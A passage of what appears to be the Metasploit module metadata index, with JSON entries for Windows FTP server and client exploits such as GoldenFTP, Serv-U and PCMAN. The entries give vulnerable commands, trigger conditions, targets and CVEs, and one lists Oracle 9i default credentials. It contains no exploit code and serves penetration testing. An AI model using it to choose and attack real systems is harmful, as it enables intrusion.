"name": "GoldenFTP PASS Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/goldenftp_pass_bof",
"rank": 200,
"disclosure_date": "2011-01-23",
"type": "exploit",
"author": [
"Craig Freyman",
"bannedit <bannedit@metasploit.com>",
"Joff Thyer <jsthyer@gmail.com>"
],
"description": "This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.",
"references": [
"CVE-2006-6576",
"OSVDB-35951",
"BID-45957",
"EDB-16036"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows XP Pro SP3",
"Windows XP Pro SP2",
"Windows XP Pro SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/goldenftp_pass_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/goldenftp_pass_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/httpdx_tolog_format": {
"name": "HTTPDX tolog() Function Format String Vulnerability",
"full_name": "exploit/windows/ftp/httpdx_tolog_format",
"rank": 500,
"disclosure_date": "2009-11-17",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in HTTPDX FTP server.\n By sending a specially crafted FTP command containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.",
"references": [
"CVE-2009-4769",
"OSVDB-60181"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"httpdx 1.4 - Windows XP SP3 English",
"httpdx 1.4.5 - Windows XP SP3 English",
"httpdx 1.4.6 - Windows XP SP3 English",
"httpdx 1.4.6b - Windows XP SP3 English",
"httpdx 1.5 - Windows XP SP3 English"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb",
"is_install_path": true,
"ref_name": "windows/ftp/httpdx_tolog_format",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/kmftp_utility_cwd": {
"name": "Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",
"full_name": "exploit/windows/ftp/kmftp_utility_cwd",
"rank": 300,
"disclosure_date": "2015-08-23",
"type": "exploit",
"author": [
"Shankar Damodaran",
"Muhamad Fadzil Ramli <mind1355@gmail.com>"
],
"description": "This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.\n Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which\n leads to an SEH overflow. Konica FTP allows anonymous access by default; valid\n credentials are typically unnecessary to exploit this vulnerability.",
"references": [
"CVE-2015-7768",
"EBD-37908"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 7 SP1 x86"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/ftp/kmftp_utility_cwd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/kmftp_utility_cwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/labf_nfsaxe": {
"name": "LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/labf_nfsaxe",
"rank": 300,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"Tulpa",
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote\n code execution.",
"references": [
"CVE-2017-18047",
"EDB-42011"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/ftp/labf_nfsaxe.rb",
"is_install_path": true,
"ref_name": "windows/ftp/labf_nfsaxe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/leapftp_list_reply": {
"name": "LeapFTP 3.0.1 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/leapftp_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"nullthreat"
],
"description": "This module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n This issue is triggered when a file with a long name is downloaded/opened.",
"references": [
"OSVDB-68640",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/leapftp_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/leapftp_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/leapftp_pasv_reply": {
"name": "LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow",
"full_name": "exploit/windows/ftp/leapftp_pasv_reply",
"rank": 300,
"disclosure_date": "2003-06-09",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n client that is triggered through an excessively long PASV reply command. This\n module was ported from the original exploit by drG4njubas with minor improvements.",
"references": [
"CVE-2003-0558",
"OSVDB-4587",
"BID-7860",
"EDB-54"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal LeapFTP.exe",
"Windows 2000 SP0/4 English",
"Windows XP SP0 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/leapftp_pasv_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/leapftp_pasv_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ms09_053_ftpd_nlst": {
"name": "MS09-053 Microsoft IIS FTP Server NLST Response Overflow",
"full_name": "exploit/windows/ftp/ms09_053_ftpd_nlst",
"rank": 500,
"disclosure_date": "2009-08-31",
"type": "exploit",
"author": [
"Kingcope <kcope2@googlemail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n service. The flaw is triggered when a special NLST argument is passed\n while the session has changed into a long directory path. For this exploit\n to work, the FTP server must be configured to allow write access to the\n file system (either anonymously or in conjunction with a real account)",
"references": [
"EDB-9541",
"CVE-2009-3023",
"OSVDB-57589",
"BID-36189",
"MSB-MS09-053"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 SP4 English/Italian (IIS 5.0)",
"Windows 2000 SP3 English (IIS 5.0)",
"Windows 2000 SP0-SP3 Japanese (IIS 5.0)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ms09_053_ftpd_nlst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/netterm_netftpd_user": {
"name": "NetTerm NetFTPD USER Buffer Overflow",
"full_name": "exploit/windows/ftp/netterm_netftpd_user",
"rank": 500,
"disclosure_date": "2005-04-26",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the NetTerm NetFTPD\n application. This package is part of the NetTerm package.\n This module uses the USER command to trigger the overflow.",
"references": [
"CVE-2005-1323",
"OSVDB-15865",
"URL-https://seclists.org/lists/fulldisclosure/2005/Apr/0578.html",
"BID-13396"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"NetTerm NetFTPD Universal",
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows 2003 English",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/ftp/netterm_netftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/netterm_netftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/odin_list_reply": {
"name": "Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)",
"full_name": "exploit/windows/ftp/odin_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Odin Secure FTP 4.1,\n triggered when processing the response on a LIST command. During the overflow,\n a structured exception handler record gets overwritten.",
"references": [
"OSVDB-68824",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP SP3 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/odin_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/odin_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/open_ftpd_wbem": {
"name": "Open-FTPD 1.2 Arbitrary File Upload",
"full_name": "exploit/windows/ftp/open_ftpd_wbem",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"Serge Gorbunov",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits multiple vulnerabilities found in Open&Compact FTP\n server. The software contains an authentication bypass vulnerability and a\n arbitrary file upload vulnerability that allows a remote attacker to write\n arbitrary files to the file system as long as there is at least one user\n who has permission.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.",
"references": [
"OSVDB-65687",
"EDB-13932",
"CVE-2010-2620"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Open&Compact FTP 1.2 on Windows (Before Vista)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/ftp/open_ftpd_wbem.rb",
"is_install_path": true,
"ref_name": "windows/ftp/open_ftpd_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/oracle9i_xdb_ftp_pass": {
"name": "Oracle 9i XDB FTP PASS Overflow (win32)",
"full_name": "exploit/windows/ftp/oracle9i_xdb_ftp_pass",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "By passing an overly long string to the PASS command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 2100,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/oracle9i_xdb_ftp_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/oracle9i_xdb_ftp_unlock": {
"name": "Oracle 9i XDB FTP UNLOCK Overflow (win32)",
"full_name": "exploit/windows/ftp/oracle9i_xdb_ftp_unlock",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"David Litchfield <david@ngssoftware.com>"
],
"description": "By passing an overly long token to the UNLOCK command, a\n stack based buffer overflow occurs. David Litchfield, has\n illustrated multiple vulnerabilities in the Oracle 9i XML\n Database (XDB), during a seminar on \"Variations in exploit\n methods between Linux and Windows\" presented at the Blackhat\n conference. Oracle9i includes a number of default accounts,\n including dbsnmp:dbsmp, scott:tiger, system:manager, and\n sys:change_on_install.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 2100,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb",
"is_install_path": true,
"ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/ftp/pcman_put": {
"name": "PCMAN FTP Server Buffer Overflow - PUT Command",
"full_name": "exploit/windows/ftp/pcman_put",
"rank": 300,
"disclosure_date": "2015-08-07",
"type": "exploit",
"author": [
"Jay Turla",
"Chris Higgins"
],
"description": "This module exploits a buffer overflow vulnerability found in the PUT command of the\n PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous\n credentials are enabled.",
"references": [
"CVE-2013-4730",
"EDB-37731",
"OSVDB-94624"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/pcman_put.rb",
"is_install_path": true,
"ref_name": "windows/ftp/pcman_put",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/pcman_stor": {
"name": "PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/pcman_stor",
"rank": 300,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"Christian (Polunchis) Ramirez",
"Rick (nanotechz9l) Flores"
],
"description": "This module exploits a buffer overflow vulnerability found in the STOR command of the\n PCMAN FTP v2.07 Server when the \"/../\" parameters are also sent to the server. Please\n note authentication is required in order to trigger the vulnerability. The overflowing\n string will also be seen on the FTP server log console.",
"references": [
"CVE-2013-4730",
"OSVDB-94624",
"EDB-27703"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/windows/ftp/pcman_stor.rb",
"is_install_path": true,
"ref_name": "windows/ftp/pcman_stor",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/proftp_banner": {
"name": "ProFTP 2.9 Banner Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/proftp_banner",
"rank": 300,
"disclosure_date": "2009-08-25",
"type": "exploit",
"author": [
"His0k4 <his0k4.hlm@gmail.com>"
],
"description": "This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.",
"references": [
"CVE-2009-3976",
"OSVDB-57394",
"URL-http://www.labtam-inc.com/index.php?act=products&pid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/proftp_banner.rb",
"is_install_path": true,
"ref_name": "windows/ftp/proftp_banner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/quickshare_traversal_write": {
"name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability",
"full_name": "exploit/windows/ftp/quickshare_traversal_write",
"rank": 600,
"disclosure_date": "2011-02-03",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.",
"references": [
"OSVDB-70776",
"EDB-16105",
"URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html",
"URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"QuickShare File Server 1.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb",
"is_install_path": true,
"ref_name": "windows/ftp/quickshare_traversal_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/ricoh_dl_bof": {
"name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
"full_name": "exploit/windows/ftp/ricoh_dl_bof",
"rank": 300,
"disclosure_date": "2012-03-01",
"type": "exploit",
"author": [
"Julien Ahrens",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).",
"references": [
"CVE-2012-5002",
"OSVDB-79691",
"URL-http://secunia.com/advisories/47912",
"URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb",
"is_install_path": true,
"ref_name": "windows/ftp/ricoh_dl_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sami_ftpd_list": {
"name": "Sami FTP Server LIST Command Buffer Overflow",
"full_name": "exploit/windows/ftp/sami_ftpd_list",
"rank": 100,
"disclosure_date": "2013-02-27",
"type": "exploit",
"author": [
"superkojiman",
"Doug Prostko <dougtko@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.",
"references": [
"OSVDB-90815",
"BID-58247",
"EDB-24557"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Sami FTP Server 2.0.1 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sami_ftpd_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sami_ftpd_user": {
"name": "KarjaSoft Sami FTP Server v2.02 USER Overflow",
"full_name": "exploit/windows/ftp/sami_ftpd_user",
"rank": 300,
"disclosure_date": "2006-01-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the KarjaSoft Sami FTP Server version 2.02\n by sending an excessively long USER string. The stack is overwritten\n when the administrator attempts to view the FTP logs. Therefore, this exploit\n is passive and requires end-user interaction. Keep this in mind when selecting\n payloads. When the server is restarted, it will re-execute the exploit until\n the logfile is manually deleted via the file system.",
"references": [
"CVE-2006-0441",
"CVE-2006-2212",
"OSVDB-25670",
"BID-16370",
"BID-22045",
"BID-17835",
"EDB-1448",
"EDB-1452",
"EDB-1462",
"EDB-3127",
"EDB-3140"
],
"platform": "Windows",
"arch": "x86",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP SP0/1 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sami_ftpd_user",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/sasser_ftpd_port": {
"name": "Sasser Worm avserve FTP PORT Buffer Overflow",
"full_name": "exploit/windows/ftp/sasser_ftpd_port",
"rank": 200,
"disclosure_date": "2004-05-10",
"type": "exploit",
"author": [
"valsmith <valsmith@metasploit.com>",
"chamuco <chamuco@gmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.",
"references": [
"OSVDB-6197"
],
"platform": "Windows",
"arch": "x86",
"rport": 5554,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows XP SP0",
"Windows XP SP1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ftp/sasser_ftpd_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/sasser_ftpd_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/scriptftp_list": {
"name": "ScriptFTP LIST Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/scriptftp_list",
"rank": 400,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"modpr0be",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. This vulnerability\n affects versions 3.3 and earlier.",
"references": [
"CVE-2011-3976",
"OSVDB-75633",
"EDB-17876",
"US-CERT-VU-440219"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows Vista"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
"is_install_path": true,
"ref_name": "windows/ftp/scriptftp_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/seagull_list_reply": {
"name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow",
"full_name": "exploit/windows/ftp/seagull_list_reply",
"rank": 400,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.",
"references": [
"OSVDB-94556",
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XP Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/seagull_list_reply.rb",
"is_install_path": true,
"ref_name": "windows/ftp/seagull_list_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/servu_chmod": {
"name": "Serv-U FTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/servu_chmod",
"rank": 300,
"disclosure_date": "2004-12-31",
"type": "exploit",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. Exploitation\n also leaves the service in a non-functional state.",
"references": [
"CVE-2004-2111",
"OSVDB-3713",
"BID-9483"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 SP0-4 EN",
"Windows XP SP0-1 EN"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/servu_chmod.rb",
"is_install_path": true,
"ref_name": "windows/ftp/servu_chmod",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/servu_mdtm": {
"name": "Serv-U FTPD MDTM Overflow",
"full_name": "exploit/windows/ftp/servu_mdtm",
"rank": 400,
"disclosure_date": "2004-02-26",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for the Serv-U\\'s MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit, the service dies after the\n shellcode finishes execution.",
"references": [
"CVE-2004-0330",
"OSVDB-4073",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html",
"BID-9751"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Serv-U Uber-Leet Universal ServUDaemon.exe",
"Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe",
"Serv-U 5.0.0.0 ServUDaemon.exe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/servu_mdtm.rb",
"is_install_path": true,
"ref_name": "windows/ftp/servu_mdtm",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/slimftpd_list_concat": {
"name": "SlimFTPd LIST Concatenation Overflow",
"full_name": "exploit/windows/ftp/slimftpd_list_concat",
"rank": 500,
"disclosure_date": "2005-07-21",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.",
"references": [
"CVE-2005-2373",
"OSVDB-18172",
"BID-14339"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"SlimFTPd Server <= 3.16 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb",
"is_install_path": true,
"ref_name": "windows/ftp/slimftpd_list_concat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/trellian_client_pasv": {
"name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/trellian_client_pasv",
"rank": 300,
"disclosure_date": "2010-04-11",
"type": "exploit",
"author": [
"zombiefx",
"dookie"
],
"description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.",
"references": [
"CVE-2010-1465",
"OSVDB-63812",
"EDB-12152"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb",
"is_install_path": true,
"ref_name": "windows/ftp/trellian_client_pasv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/turboftp_port": {
"name": "Turbo FTP Server 1.30.823 PORT Overflow",
"full_name": "exploit/windows/ftp/turboftp_port",
"rank": 500,
"disclosure_date": "2012-10-03",
"type": "exploit",
"author": [
"Zhao Liang",
"Lincoln",
"corelanc0d3r",
"thelightcosine"
],
"description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.",
"references": [
"EDB-22161",
"OSVDB-85887"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows Universal TurboFtp 1.30.823",
"Windows Universal TurboFtp 1.30.826"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/turboftp_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/turboftp_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/vermillion_ftpd_port": {
"name": "Vermillion FTP Daemon PORT Command Memory Corruption",
"full_name": "exploit/windows/ftp/vermillion_ftpd_port",
"rank": 500,
"disclosure_date": "2009-09-23",
"type": "exploit",
"author": [
